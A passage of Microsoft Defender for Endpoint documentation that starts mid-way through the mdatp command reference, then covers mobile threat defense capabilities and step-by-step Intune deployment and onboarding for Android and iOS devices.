potentially_unwanted_application --action
block
Configuration Turn off PUA protection mdatp threat policy set --type
potentially_unwanted_application --action
off
Configuration Turn on audit mode for PUA mdatp threat policy set --type
protection potentially_unwanted_application --action
audit
Configuration Configure degree of mdatp config maximum-on-demand-scan-

parallelism for on-demand threads --value [numerical-value-between-1-
scans and-64]
Configuration Turn on/off scans after mdatp config scan-after-definition-update

security intelligence updates --value [enabled/disabled]
Configuration Turn on/off archive scanning mdatp config scan-archives --value

(on-demand scans only) [enabled/disabled]
Configuration Turn on/off file hash mdatp config enable-file-hash-computation

computation --value [enabled/disabled]
Diagnostics Change the log level mdatp log level set --level verbose
[error|warning|info|verbose]
Diagnostics Generate diagnostic logs mdatp diagnostic create --path [directory]
Diagnostics Size limits for retained product mdatp config log-rotation-parameters [max-
logs current-size/max-rotated-size] --size
[value in MB]
Health Check the product's health mdatp health
Protection Scan a path mdatp scan custom --path [path] [--ignore-

exclusions]
Protection Do a quick scan mdatp scan quick

Protection Do a full scan mdatp scan full
Protection Cancel an ongoing on- mdatp scan cancel

demand scan
Protection Request a security intelligence mdatp definitions update

update
Protection Print the full protection history mdatp threat list

history
Protection Get threat details mdatp threat get --id [threat-id]

history
Quarantine List all quarantined files mdatp threat quarantine list

management
Quarantine Remove all files from the mdatp threat quarantine remove-all
management quarantine
Quarantine Add a file detected as a threat mdatp threat quarantine add --id [threat-
management to the quarantine id]
Quarantine Remove a file detected as a mdatp threat quarantine remove --id

management threat from the quarantine [threat-id]
Quarantine Restore a file from the mdatp threat quarantine restore --id
management quarantine. Available in [threat-id] --path [destination-folder]
Defender for Endpoint version
lower than 101.23092.0012.
Quarantine Restore a file from the mdatp threat quarantine restore threat-id
management quarantine with Threat ID. --id [threat-id] --destination-path
Available in Defender for [destination-folder]
Endpoint version
101.23092.0012 or higher.
Quarantine Restore a file from the mdatp threat quarantine restore threat-
management quarantine with Threat path --path [threat-original-path] --
Original Path. Available in destination-path [destination-folder]
Defender for Endpoint version
101.23092.0012 or higher.
Endpoint Set early preview mdatp edr early-preview

Detection and [enabled\|disabled]
Response
Endpoint Set group-id mdatp edr group-ids --group-id [group-id]

Detection and
Response
Endpoint Set / remove tag, only GROUP mdatp edr tag set --name GROUP --value
Detection and supported [tag]
Response
Endpoint List exclusions (root) mdatp edr exclusion list

Detection and [processes|paths|extensions|all]
Response
 Tip
Feedback

Microsoft Defender for Endpoint -
Mobile Threat Defense
Article • 01/29/2024
Applies to:

Microsoft Defender for Endpoint on Android and iOS is our mobile threat defense
solution (MTD). Typically, companies are proactive in protecting PCs from vulnerabilities
and attack while mobile devices often go unmonitored and unprotected. Where mobile
platforms have built-in protection such as app isolation and vetted consumer app
stores, these platforms remain vulnerable to web-based or other sophisticated attacks.
As more employees use devices for work and to access sensitive information, it's
imperative that companies deploy an MTD solution to protect devices and your
resources from increasingly sophisticated attacks on mobiles.
Key capabilities
Microsoft Defender for Endpoint on Android and iOS provides the below key
capabilities, For information about the latest features and benefits, read our
announcements .
ﾉ Expand table
Capability Description
Web Protection Anti-phishing, blocking unsafe network connections, and support for
custom indicators for URLs and domains. (File and IP indicators are not
currently supported.)
Malware Protection Scanning for malicious apps.

(Android-only)
Jailbreak Detection Detection of jailbroken devices.

(iOS-only)
Capability Description
Microsoft Defender Vulnerability assessment of onboarded mobile devices. Includes OS and

Vulnerability Apps vulnerabilities assessment for both Android and iOS. Visit this
Management (MDVM) page to learn more about Microsoft Defender Vulnerability
Management in Microsoft Defender for Endpoint.
Network Protection Protection against rogue Wi-Fi related threats and rogue certificates;
ability to allow list the root CA and private root CA certificates in Intune;
establish trust with endpoints.
Unified alerting Alerts from all platforms in the unified M365 security console.
Conditional Access, Blocking risky devices from accessing corporate resources. Defender for
Conditional launch Endpoint risk signals can also be added to app protection policies
(MAM).
Privacy Controls Configure privacy in the threat reports by controlling the data sent by
Microsoft Defender for Endpoint. Privacy controls are available for
admin and end users. It's there for enrolled and unenrolled devices as
well.
Integration with Integration with Microsoft Tunnel, a VPN gateway solution to enable
Microsoft Tunnel security and connectivity in a single app. Available on both Android and
iOS.
All these capabilities are available for Microsoft Defender for Endpoint license holders.
For more information, see Licensing requirements.
Overview and Deploy

Deployment of Microsoft Defender for Endpoint on mobile can be done via Microsoft
Intune. Watch this video for a quick overview of MTD capabilities and deployment:
https://www.microsoft.com/en-us/videoplayer/embed/RWMpiC?postJsllMsg=true
Deploy
The following table summarizes how to deploy Microsoft Defender for Endpoint on
Android and iOS. For detailed documentation, see
Overview of Microsoft Defender for Endpoint on Android, and

Overview of Microsoft Defender for Endpoint on iOS
Android
ﾉ Expand table
Enrollment type Details
Android Enterprise with Intune Deploy on Android Enterprise

enrolled devices
Device Administrator with Intune Deploy on Device Administrator

enrolled devices
Unmanaged BYOD OR devices managed by other enterprise Configure Defender risk signals in
mobility management / Set up app protection policy (MAM) app protection policy (MAM)
iOS
ﾉ Expand table
Enrollment type Details
Supervised devices with Intune 1. Deploy as iOS store app

2. Setup Web Protection without
VPN for supervised iOS devices
Unsupervised (BYOD) devices enrolled with Intune Deploy as iOS store app
Unmanaged BYOD OR devices managed by other enterprise Configure Defender risk signals in
mobility management / Set up app protection policy (MAM) app protection policy (MAM)
End-user onboarding
Configure Zero-touch onboard for iOS enrolled devices: Admins can configure
zero-touch install to silently onboard Microsoft Defender for Endpoint on enrolled
iOS devices without requiring the user to open the app.
Configure Conditional Access to enforce user onboarding: This can be applied to

ensure end-users onboard to the Microsoft Defender for Endpoint app after
deploying. Watch this video for a quick demo on configuring conditional access
with Defender for Endpoint risk signals.
https://www.microsoft.com/en-us/videoplayer/embed/RWMwR1?postJsllMsg=true
Simplify Onboarding
iOS - Zero-Touch Onboard
Android Enterprise - Setup Always-on VPN.
iOS - Auto-setup of VPN profile
Pilot evaluation
While evaluating mobile threat defense with Microsoft Defender for Endpoint, you can
verify that certain criteria is met before proceeding to deploy the service to a larger set
of devices. You can define the exit criteria and ensure that they're satisfied before
deploying widely.
This helps reduce potential issues that could arise while rolling out the service. Here are
some tests and exit criteria that might help:
Devices show up in the device inventory list: After successful onboarding of

Defender for Endpoint on the mobile device, verify that the device is listed in the
Device Inventory in the security console .
Run a malware detection test on an Android device: Install any test virus app from
the Google play store and verify that it gets detected by Microsoft Defender for
Endpoint. Here's an example app that can be used for this test: Test virus . Note
that on Android Enterprise with a work profile, only the work profile is supported.
Run a phishing test: Browse to https://smartscreentestratings2.net and verify

that it gets blocked by Microsoft Defender for Endpoint. Note that on Android
Enterprise with a work profile, only the work profile is supported.
Alerts appear in dashboard: Verify that alerts for above detection tests appear on
the security console .
Need help in deploying or configuring Defender for Endpoint on Android & iOS? If you
have at least 150 licenses for the product, use your FastTrack benefits. Learn more about
FastTrack at Microsoft FastTrack .
Configure
Configure Android features
Configure iOS features
Configure Web Protection without VPN for supervised iOS devices
Resources
Stay informed about upcoming releases by reading our announcements .
 Tip
Feedback

on Android with Microsoft Intune
Article • 03/08/2023
Applies to:

Learn how to deploy Defender for Endpoint on Android on Microsoft Intune Company
Portal enrolled devices. For more information about Microsoft Intune device enrollment,
see Enroll your device.
７ Note
Defender for Endpoint on Android is now available on Google Play
You can connect to Google Play from Microsoft Intune to deploy Defender for
Endpoint app across Device Administrator and Android Enterprise enrollment
modes.
Updates to the app are automatic via Google Play.
Deploy on Device Administrator enrolled

devices
Learn how to deploy Defender for Endpoint on Android with Microsoft Intune Company
Portal - Device Administrator enrolled devices.
Add as Android store app

1. In Microsoft Intune admin center , go to Apps > Android Apps > Add >
Android store app and choose Select.

2. On the Add app page and in the App Information section enter:
Name
Description
Publisher as Microsoft.
App store URL as https://play.google.com/store/apps/details?
id=com.microsoft.scmx (Defender for Endpoint app Google Play Store URL)
Other fields are optional. Select Next.
3. In the Assignments section, go to the Required section and select Add group. You
can then choose the user group(s) that you would like to target Defender for
Endpoint on Android app. Choose Select and then Next.
７ Note
The selected user group should consist of Intune enrolled users.
4. In the Review+Create section, verify that all the information entered is correct and
then select Create.
In a few moments, the Defender for Endpoint app would be created successfully,
and a notification would show up at the top-right corner of the page.
5. In the app information page that is displayed, in the Monitor section, select Device
install status to verify that the device installation has completed successfully.
Complete onboarding and check status

1. Once Defender for Endpoint on Android has been installed on the device, you'll
see the app icon.

2. Tap the Microsoft Defender for Endpoint app icon and follow the on-screen
instructions to complete onboarding the app. The details include end-user
acceptance of Android permissions required by Defender for Endpoint on Android.
3. Upon successful onboarding, the device will start showing up on the Devices list in
Deploy on Android Enterprise enrolled devices

Defender for Endpoint on Android supports Android Enterprise enrolled devices.
For more information on the enrollment options supported by Microsoft Intune, see
Enrollment Options.
Currently, Personally owned devices with work profile and Corporate-owned fully
managed user device enrollments are supported for deployment.
Add Microsoft Defender for Endpoint on
Android as a Managed Google Play app
Follow the steps below to add Microsoft Defender for Endpoint app into your managed
Google Play.
1. In Microsoft Intune admin center , go to Apps > Android Apps > Add and select
Managed Google Play app.
2. On your managed Google Play page that loads subsequently, go to the search box
and enter Microsoft Defender . Your search should display the Microsoft Defender
for Endpoint app in your Managed Google Play. Click on the Microsoft Defender
for Endpoint app from the Apps search result.
3. In the App description page that comes up next, you should be able to see app
details on Defender for Endpoint. Review the information on the page and then
select Approve.

4. You'll be presented with the permissions that Defender for Endpoint obtains for it
to work. Review them and then select Approve.

5. You'll be presented with the Approval settings page. The page confirms your
preference to handle new app permissions that Defender for Endpoint on Android
might ask. Review the choices and select your preferred option. Select Done.
By default, managed Google Play selects Keep approved when app requests new
permissions.
6. After the permissions handling selection is made, select Sync to sync Microsoft
Defender for Endpoint to your apps list.

7. The sync will complete in a few minutes.
8. Select the Refresh button in the Android apps screen and Microsoft Defender for
Endpoint should be visible in the apps list.
9. Defender for Endpoint supports App configuration policies for managed devices
via Microsoft Intune. This capability can be leveraged to select different
configurations for Defender.
a. In the Apps page, go to Policy > App configuration policies > Add > Managed
devices.

b. In the Create app configuration policy page, enter the following details:
Name: Microsoft Defender for Endpoint.

Choose Android Enterprise as platform.
Choose Personally-owned Work Profile only or Fully Managed,
Dedicated, and Corporate-owned work profile only as Profile Type.
Click Select App, choose Microsoft Defender, select OK and then Next.
c. Select Permissions > Add. From the list, select the available app permissions >
OK.
d. Select an option for each permission to grant with this policy:
Prompt - Prompts the user to accept or deny.

Auto grant - Automatically approves without notifying the user.
Auto deny - Automatically denies without notifying the user.
e. Go to the Configuration settings section and choose 'Use configuration

designer' in Configuration settings format.
f. Click on Add to view a list of supported configurations. Select the required

configuration and click on Ok.
g. You should see all the selected configurations listed. You can change the
configuration value as required and then select Next.

h. In the Assignments page, select the user group to which this app config policy
would be assigned. Click Select groups to include and selecting the applicable
group and then selecting Next. The group selected here is usually the same
group to which you would assign Microsoft Defender for Endpoint Android app.
i. In the Review + Create page that comes up next, review all the information and
then select Create.
The app configuration policy for Defender for Endpoint is now assigned to the
selected user group.
10. Select Microsoft Defender app in the list > Properties > Assignments > Edit.

11. Assign the app as a Required app to a user group. It is automatically installed in the
work profile during the next sync of the device via Company Portal app. This
assignment can be done by navigating to the Required section > Add group,
selecting the user group and click Select.
12. In the Edit Application page, review all the information that was entered above.
Then select Review + Save and then Save again to commence assignment.
Auto Setup of Always-on VPN

Defender for Endpoint supports Device configuration policies for managed devices via
Microsoft Intune. This capability can be leveraged to Auto setup of Always-on VPN on
Android Enterprise enrolled devices, so the end user does not need to set up VPN
service while onboarding.
1. On Devices, select Configuration Profiles > Create Profile > Platform > Android
Enterprise
Select Device restrictions under one of the following, based on your device
enrollment type:
Fully Managed, Dedicated, and Corporate-Owned Work Profile

Personally owned Work Profile
Select Create.
2. Configuration Settings Provide a Name and a Description to uniquely identify the


3. Select Connectivity and configure VPN:
Enable Always-on VPN
Set up a VPN client in the work profile to automatically connect and

reconnect to the VPN whenever possible. Only one VPN client can be
configured for always-on VPN on a given device, so be sure to have no more
than one always-on VPN policy deployed to a single device.
Select Custom in VPN client dropdown list
Custom VPN in this case is Defender for Endpoint VPN which is used to
provide the Web Protection feature.
７ Note
Microsoft Defender for Endpoint app must be installed on user's device,

in order to functioning of auto setup of this VPN.
Enter Package ID of the Microsoft Defender for Endpoint app in Google Play
store. For the Defender app URL https://play.google.com/store/apps/details?
id=com.microsoft.scmx , Package ID is com.microsoft.scmx
Lockdown mode Not configured (Default)


4. Assignment
In the Assignments page, select the user group to which this app config policy
would be assigned. Choose Select groups to include and selecting the applicable
group and then select Next. The group selected here is usually the same group to
which you would assign Microsoft Defender for Endpoint Android app.
5. In the Review + Create page that comes up next, review all the information and
then select Create. The device configuration profile is now assigned to the selected
user group.

Check status and complete onboarding

1. Confirm the installation status of Microsoft Defender for Endpoint on Android by
clicking on the Device Install Status. Verify that the device is displayed here.
2. On the device, you can validate the onboarding status by going to the work
profile. Confirm that Defender for Endpoint is available and that you are enrolled
to the Personally owned devices with work profile. If you are enrolled to a
Corporate-owned, fully managed user device, you will have a single profile on the
device where you can confirm that Defender for Endpoint is available.

3. When the app is installed, open the app and accept the permissions and then your
onboarding should be successful.
4. At this stage the device is successfully onboarded onto Defender for Endpoint on
Android. You can verify this on the Microsoft Defender portal by navigating to
the Device Inventory page.

Set up Microsoft Defender in Personal Profile

on Android Enterprise in BYOD mode
Set up Microsoft Defender in Personal Profile

Admins can go to the Microsoft Endpoint Management admin center to set up and
configure Microsoft Defender support in personal profiles by following these steps:
1. Go to Apps> App configuration policies and click on Add. Select Managed

Devices.
2. Enter Name and Description to uniquely identify the configuration policy. Select
platform as 'Android Enterprise', Profile type as 'Personally-owned work profile
only' and Targeted app as 'Microsoft Defender'.
3. On the settings page, in 'Configuration settings format', select 'Use configuration
designer' and click on Add. From the list of configurations that are displayed,
select 'Microsoft Defender in Personal profile'.
4. The selected configuration will be listed. Change the configuration value to 1 to

enable Microsoft Defender support personal profiles. A notification will appear
informing the admin about the same. Click on Next.
5. Assign the configuration policy to a group of users. Review and create the policy.
Admins also can set up privacy controls from the Microsoft Intune admin center to
control what data can be sent by the Defender mobile client to the security portal. For
more information, see configuring privacy controls.
Organizations can communicate to their users to protect Personal profile with Microsoft
Defender on their enrolled BYOD devices.
Pre-requisite: Microsoft Defender must be already installed and active in work

profile to enabled Microsoft Defender in personal profiles.
To complete onboarding a device

1. Install the Microsoft Defender application in a personal profile with a personal
Google Play store account.
2. Install the Company portal application on personal profile. No sign-in is required.
3. When a user launches the application, they'll see the sign-in screen. Login using
corporate account only.
4. On a successful login, users will see the following screens:
a. EULA screen: Presented only if the user has not consented already in the Work
profile.
b. Notice screen: Users need to provide consent on this screen to move forward
with onboarding the application. This is required only during the first run of the
app.
5. Provide the required permissions to complete onboarding.
７ Note
Pre-requisite:
1. The Company portal needs to be enabled on personal profile.

2. Microsoft Defender needs to be already installed and active in work profile.
Related topics
Overview of Microsoft Defender for Endpoint on Android
 Tip
Feedback

on iOS with Microsoft Intune
Article • 11/27/2023
Applies to:

This topic describes deploying Defender for Endpoint on iOS on Microsoft Intune
Company Portal enrolled devices. For more information about Microsoft Intune device
enrollment, see Enroll iOS/iPadOS devices in Intune.
Before you begin

Ensure you have access to the Microsoft Intune admin center .
Ensure iOS enrollment is done for your users. Users need to have a Defender for
Endpoint license assigned in order to use Defender for Endpoint on iOS. Refer to
Assign licenses to users for instructions on how to assign licenses.
Ensure the end users have company portal app installed, signed in and enrollment
completed.
７ Note
Microsoft Defender for Endpoint on iOS is available in the Apple App Store .
This section covers:
1. Deployment steps (applicable for both Supervised and Unsupervised devices)-

Admins can deploy Defender for Endpoint on iOS via Microsoft Intune Company
Portal. This step is not needed for VPP (volume purchase) apps.
2. Complete deployment (only for Supervised devices)- Admins can select to deploy
any one of the given profiles.
a. Zero touch (Silent) Control Filter - Provides Web Protection without the local
loopback VPN and also enables silent onboarding for users. App is
automatically installed and activated without the need for user to open the app.
b. Control Filter - Provides Web Protection without the local loopback VPN.
3. Automated Onboarding setup (only for Unsupervised devices) - Admins can

automate the Defender for Endpoint onboarding for users in two different ways:
a. Zero touch (Silent) Onboarding - App is automatically installed and activated
without the need for users to open the app.
b. Auto Onboarding of VPN - Defender for Endpoint VPN profile is automatically
set up without having the user to do so during onboarding. This step is not
recommended in Zero touch configurations.
4. User Enrollment setup (only for Intune User Enrolled devices) - Admins can deploy
and configure the Defender for Endpoint app on the Intune User Enrolled devices
also.
5. Complete onboarding and check status - This step is applicable for all enrollment
types to ensure app is installed on the device, onboarding is completed and device
is visible in the Microsoft Defender portal. It can be skipped for the zero touch
(silent) onboarding.
Deployment steps (applicable for both

Supervised and Unsupervised devices)
Deploy Defender for Endpoint on iOS via Microsoft Intune Company Portal.
Add iOS store app

1. In the Microsoft Intune admin center , go to Apps > iOS/iPadOS > Add > iOS
store app and click Select.

2. On the Add app page, click on Search the App Store and type Microsoft Defender
in the search bar. In the search results section, click on Microsoft Defender and click
Select.
3. Select iOS 15.0 as the Minimum operating system. Review the rest of information
about the app and click Next.
4. In the Assignments section, go to the Required section and select Add group. You
can then choose the user group(s) that you would like to target Defender for
Endpoint on iOS app. Click Select and then Next.
７ Note
The selected user group should consist of Microsoft Intune enrolled users.
5. In the Review + Create section, verify that all the information entered is correct and
then select Create. In a few moments, the Defender for Endpoint app should be
created successfully, and a notification should show up at the top-right corner of
the page.
6. In the app information page that is displayed, in the Monitor section, select Device
install status to verify that the device installation has completed successfully.
Complete deployment for supervised devices

The Microsoft Defender for Endpoint on iOS app has specialized ability on supervised
iOS/iPadOS devices, given the increased management capabilities provided by the
platform on these types of devices. It can also provide Web Protection without setting
up a local VPN on the device. This gives end-users a seamless experience while still
being protected from phishing and other web-based attacks.
Admins can use the following steps to configure supervised devices.
Configure Supervised Mode via Microsoft Intune

Configure the supervised mode for Defender for Endpoint app through an App
configuration policy and Device configuration profile.
App configuration policy
７ Note
This app configuration policy for supervised devices is applicable only to managed
devices and should be targeted for ALL managed iOS devices as a best practice.
1. Sign in to the Microsoft Intune admin center and go to Apps > App
configuration policies > Add. Select Managed devices.

2. In the Create app configuration policy page, provide the following information:
Policy Name
Platform: Select iOS/iPadOS
Targeted app: Select Microsoft Defender for Endpoint from the list
3. In the next screen, select Use configuration designer as the format. Specify the
following properties:
Configuration Key: issupervised

Value type: String
Configuration Value: {{issupervised}}

4. Select Next to open the Scope tags page. Scope tags are optional. Select Next to
continue.
5. On the Assignments page, select the groups that will receive this profile. For this
scenario, it is best practice to target All Devices. For more information on
assigning profiles, see Assign user and device profiles.
When deploying to user groups, a user must sign in to a device before the policy
applies.
Click Next.
6. On the Review + create page, when you're done, choose Create. The new profile is
displayed in the list of configuration profiles.
Device configuration profile (Control Filter)
７ Note
For devices that run iOS/iPadOS (in Supervised Mode), there is custom
.mobileconfig profile, called the ControlFilter profile available. This profile enables
Web Protection without setting up the local loopback VPN on the device. This
gives end-users a seamless experience while still being protected from phishing
and other web-based attacks.
However, the ControlFilter profile does not work with Always-On VPN (AOVPN)
due to platform restrictions.
Admins deploy any one of the given profiles.
1. Zero touch (Silent) Control Filter - This profile enables silent onboarding for users.
Download the config profile from ControlFilterZeroTouch
2. Control Filter - Download the config profile from ControlFilter .
Once the profile has been downloaded, deploy the custom profile. Follow the steps
below:
1. Navigate to Devices > iOS/iPadOS > Configuration profiles > Create Profile.
2. Select Profile Type > Templates and Template name > Custom.
3. Provide a name of the profile. When prompted to import a Configuration profile

file, select the one downloaded from the previous step.
4. In the Assignment section, select the device group to which you want to apply this
profile. As a best practice, this should be applied to all managed iOS devices.
Select Next.
７ Note
Device Group creation is supported in both Defender for Endpoint Plan 1 and
Plan 2.
5. On the Review + create page, when you're done, choose Create. The new profile is
displayed in the list of configuration profiles.
Automated Onboarding setup (only for
Unsupervised devices)
Admins can automate the Defender onboarding for users in two different ways with
Zero touch(Silent) Onboarding or Auto Onboarding of VPN.
Zero-touch (Silent) onboarding of Microsoft Defender for

Endpoint
７ Note
Zero-touch cannot be configured on iOS devices that are enrolled without user
affinity (user-less devices or shared devices).
Admins can configure Microsoft Defender for Endpoint to deploy and activate silently. In
this flow, the administrator creates a deployment profile and the user is simply notified
of the installation. Defender for Endpoint is automatically installed without the need for
the user to open the app. Follow the steps below to set up zero-touch or silent
deployment of Defender for Endpoint on enrolled iOS devices:
1. In the Microsoft Intune admin center , go to Devices > Configuration Profiles >
Create Profile.
2. Choose Platform as iOS/iPadOS, Profile type as Templates and Template name as

VPN. Select Create.
3. Type a name for the profile and select Next.
4. Select Custom VPN for Connection Type and in the Base VPN section, enter the
following:
Connection Name = Microsoft Defender for Endpoint

VPN server address = 127.0.0.1
Auth method = "Username and password"
Split Tunneling = Disable
VPN identifier = com.microsoft.scmx
In the key-value pairs, enter the key SilentOnboard and set the value to True.
Type of Automatic VPN = On-demand VPN
Select Add for On Demand Rules and select I want to do the following =
Connect VPN, I want to restrict to = All domains.

To mandate that VPN can't be disabled in users device, Admins can select Yes
from Block users from disabling automatic VPN. By default, it's not
configured and users can disable VPN only in the Settings.
To allow Users to Change the VPN toggle from within the app, add
EnableVPNToggleInApp = TRUE, in the key-value pairs. By default, users
can't change the toggle from within the app.
5. Select Next and assign the profile to targeted users.
then select Create.
Once the above configuration is done and synced with the device, the following actions
take place on the targeted iOS device(s):
Microsoft Defender for Endpoint will be deployed and silently onboarded and the
device will be seen in the Defender for Endpoint portal.
A provisional notification will be sent to the user device.
Web Protection and other features will be activated.
７ Note
For supervised devices, admins can setup Zero touch onboarding with the new
ZeroTouch Control Filter Profile.
Defender for Endpoint VPN Profile will not be installed on the device and Web
protection will be provided by the Control Filter Profile.
Auto-Onboarding of VPN profile (Simplified Onboarding)
７ Note
This step simplifies the onboarding process by setting up the VPN profile. If you are
using Zero touch, you do not need to perform this step.
For unsupervised devices, a VPN is used to provide the Web Protection feature. This is
not a regular VPN and is a local/self-looping VPN that does not take traffic outside the
device.
Admins can configure auto-setup of VPN profile. This will automatically set up the
Defender for Endpoint VPN profile without having the user to do so while onboarding.
1. In the Microsoft Intune admin center , go to Devices > Configuration Profiles >
Create Profile.
2. Choose Platform as iOS/iPadOS and Profile type as VPN. Click Create.
3. Type a name for the profile and click Next.
4. Select Custom VPN for Connection Type and in the Base VPN section, enter the
following:
Connection Name = Microsoft Defender for Endpoint
VPN server address = 127.0.0.1

Auth method = "Username and password"
Split Tunneling = Disable
VPN identifier = com.microsoft.scmx
In the key-value pairs, enter the key AutoOnboard and set the value to True.
Type of Automatic VPN = On-demand VPN
Select Add for On Demand Rules and select I want to do the following =
Connect VPN, I want to restrict to = All domains.
To require that VPN cannot be disabled on a users' device, Admins can select
Yes from Block users from disabling automatic VPN. By default, this setting
not configured and users can disable VPN only in the Settings.
To allow Users to Change the VPN toggle from within the app, add
EnableVPNToggleInApp = TRUE, in the key-value pairs. By default, users
cannot change the toggle from within the app.
5. Click Next and assign the profile to targeted users.
then select Create.
User Enrollment setup (only for Intune User

Enrolled devices)
） Important
User Enrollment for Microsoft Defender on iOS is in public preview. The following
information relates to prereleased product which may be substantially modified
before it's commercially released. Microsoft makes no warranties, express or
implied, with respect to the information provided here.
Microsoft Defender iOS app can be deployed on the Intune User Enrolled devices using
the following steps.
Admin
1. Set up User Enrollment Profile in Intune. Intune supports account driven Apple
User Enrollment and Apple User Enrollment with Company Portal. Read more
about the comparison of the two methods and select one.
Set up user enrollment with Company Portal

Set up account driven user enrollment
2. Set up SSO Plugin. Authenticator app with SSO extension is a pre-requisite for user
enrollment in an iOS device.
Create is Device configuration Profile in Intune- Configure iOS/iPadOS

Enterprise SSO plug-in with MDM | Microsoft Learn.
Ensure to add these two keys in the above configuration:
App bundle ID: Include the Defender App bundle ID in this list
com.microsoft.scmx
Additional configuration: Key - device_registration ; Type - String ; Value-
{{DEVICEREGISTRATION}}
3. Set up the MDM Key for User Enrollment.

In Intune, go to Go to Apps > App configuration policies > Add > Managed
devices
Give the policy a name, select Platform > iOS/iPadOS,
Select Microsoft Defender for Endpoint as the target app.
In Settings page, select Use configuration designer and add
UserEnrolmentEnabled as the key, value type as String, value as True.
4. Admin can push Defender as a required VPP app from Intune.
End User
Defender app is installed into the user's device. User signs in and completes the
onboarding. Once the device is successfully onboarded, it will be visible in the Defender
Security Portal under Device Inventory.
Supported features and limitations

1. Supported all the current capabilities of MDE iOS like – Web protection, Network
Protection, Jailbreak detection, Vulnerabilities in OS and Apps, Alerting in Defender
Security Portal and Compliance policies.
2. Zero touch (silent) deployment and auto onboarding of VPN is not supported with
User Enrollment since admins cannot push a device wide VPN profile with User
Enrollment.
3. For Vulnerability management of apps, only apps in the work profile will be visible.
4. Read more on the User Enrollment limitations and capabilities.
Complete onboarding and check status

1. Once Defender for Endpoint on iOS has been installed on the device, you will see
the app icon.
2. Tap the Defender for Endpoint app icon (MSDefender) and follow the on-screen
instructions to complete the onboarding steps. The details include end-user
acceptance of iOS permissions required by Defender for Endpoint on iOS.
７ Note
Skip this step if you configure zero touch (silent) onboarding. Manually launching
application is not necessary if zero touch (silent) onboarding is configured.
3. Upon successful onboarding, the device will start showing up on the Devices list in
Next Steps
Configure app protection policy to include Defender for Endpoint risk signals
(MAM)
Configure Defender for Endpoint on iOS features
 Tip
Feedback

on iOS with Mobile Application
Management
Article • 05/15/2023
Applies to:

７ Note
Defender for Endpoint on iOS uses a VPN in order to provide the Web Protection
feature. This is not a regular VPN and is a local/self-looping VPN that does not take
traffic outside the device.
Configure Microsoft Defender for Endpoint risk

signals in app protection policy (MAM)
Microsoft Defender for Endpoint on iOS, which already protects enterprise users on
Mobile Device Management (MDM) scenarios, now extends support to Mobile App
Management (MAM), for devices that are not enrolled using Intune mobile device
management (MDM). It also extends this support to customers who use other enterprise
mobility management solutions, while still using Intune for mobile application
management (MAM).This capability allows you to manage and protect your
organization's data within an application.
Microsoft Defender for Endpoint on iOS threat information is leveraged by Intune App
Protection Policies to protect these apps. App protection policies (APP) are rules that
ensure an organization's data remains safe or contained in a managed app. A managed
application has app protection policies applied to it and can be managed by Intune.
Microsoft Defender for Endpoint on iOS supports both the configurations of MAM
Intune MDM + MAM: IT administrators can only manage apps using App
Protection Policies on devices that are enrolled with Intune mobile device
management (MDM).
MAM without device enrollment: MAM without device enrollment, or MAM-WE,
allows IT administrators to manage apps using App Protection Policies on devices
not enrolled with Intune MDM. This means apps can be managed by Intune on
devices enrolled with third-party EMM providers. To manage apps using in both
the above configurations customers should use Intune in the Microsoft Intune
admin center
To enable this capability an administrator needs to configure the connection between

Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply
the policy on targeted devices and applications.
End users also need to take steps to install Microsoft Defender for Endpoint on their
device and activate the onboarding flow.
Pre-requisites
1. Verify that the Intune connector is enabled in Security portal.
On the unified security console , go to Settings > Endpoints > Advanced
Features and ensure that Microsoft Intune connection is enabled.
2. Verify that the APP connector is enabled in Intune portal.

In the Microsoft Intune admin center , go to Endpoint Security > Microsoft
Defender for Endpoint and ensure that the Connection status is enabled.

Create an app protection policy

Block access or wipe data of a managed app based on Microsoft Defender for Endpoint
risk signals by creating an app protection policy. Microsoft Defender for Endpoint can
be configured to send threat signals to be used in app protection policies (APP, also
known as MAM). With this capability, you can use Microsoft Defender for Endpoint to
protect managed apps.
1. Create a policy
App protection policies (APP) are rules that ensure an organization's data remains
safe or contained in a managed app. A policy can be a rule that is enforced when
the user attempts to access or move "corporate" data, or a set of actions that are
prohibited or monitored when the user is inside the app.

2. Add apps
a. Choose how you want to apply this policy to apps on different devices. Then add
at least one app.
Use this option to specify whether this policy applies to unmanaged devices. You
can also choose to target your policy to apps on devices of any management state.
Because mobile app management doesn't require device management, you can
protect company data on both managed and unmanaged devices. The
management is centered on the user identity, which removes the requirement for
device management. Companies can use app protection policies with or without
MDM at the same time. For example, consider an employee that uses both a
phone issued by the company, and their own personal tablet. The company phone
is enrolled in MDM and protected by app protection policies while the personal
device is protected by app protection policies only.
b. Select Apps
A managed app is an app that has app protection policies applied to it, and can be
managed by Intune. Any app that has been integrated with the Intune SDK or
wrapped by the Intune App Wrapping Tool can be managed using Intune app
protection Policies. See the official list of Microsoft Intune protected apps that
have been built using these tools and are available for public use.
Example: Outlook as a managed app


Select the Platform, Apps, Data protection, Access requirements settings that
your organization requires for your policy.
3.Set sign-in security requirements for your protection policy.

Select Setting > Max allowed device threat level in Conditional Launch > Device
Conditions and enter a value. This will need to be configured to either Low, Medium,
High, or Secured. The actions available to you will be Block access or Wipe data. Select
Action: "Block Access". Microsoft Defender for Endpoint on iOS shares this Device
Threat Level.
4.Assign user groups for whom the policy needs to be applied.

Select Included groups. Then add the relevant groups.
For more information on MAM or app protection policy, see iOS app protection policy
settings.
Deploy Microsoft Defender for Endpoint for
MAM or on unenrolled devices
Microsoft Defender for Endpoint on iOS enables the app protection policy scenario and
is available in the Apple app store.
When app protection policies are configured for apps to include device risk signals from
Microsoft Defender for Endpoint, users will be redirected to install Microsoft Defender
for Endpoint when using such apps. Alternately, users can also install the latest version
of the app directly from the Apple app store.
Ensure the device is registered to Authenticator with the same account being used to
onboard in Defender for successful MAM registration.
 Tip
Feedback

Resources for Microsoft Defender for Endpoint
for mobile devices
Article • 02/09/2024
Microsoft Defender for Endpoint provides multiple capabilities on mobile devices. Some of these
capabilities are set to default, and some require admin configuration. The following table shows how to
configure the resources related to Microsoft Defender for Endpoint on Android and iOS.
Feature configurations
ﾉ Expand table
Configuration Description Android AE Android MAM iOS

config key
Web Admins can Antiphishing Antiphishing=0/1(default), VPN = WebProtection = true (default) /

Protection use this = 0/1 0/1(default) false
setting to (default),
change the VPN =
web 0/1(default)
protection
feature.
When
disabled,
end users
aren't asked
for VPN
permissions
Network Network Enable DefenderNetworkProtectionEnable DefenderNetworkProtectionEnable

Protection protection is Network = 0(default)/1 = 0(default)/1
disabled by protection in
default. Microsoft
Admins can Defender =
enable it to 0(default)/1
include
rogue WiFi
and
certificate
detection
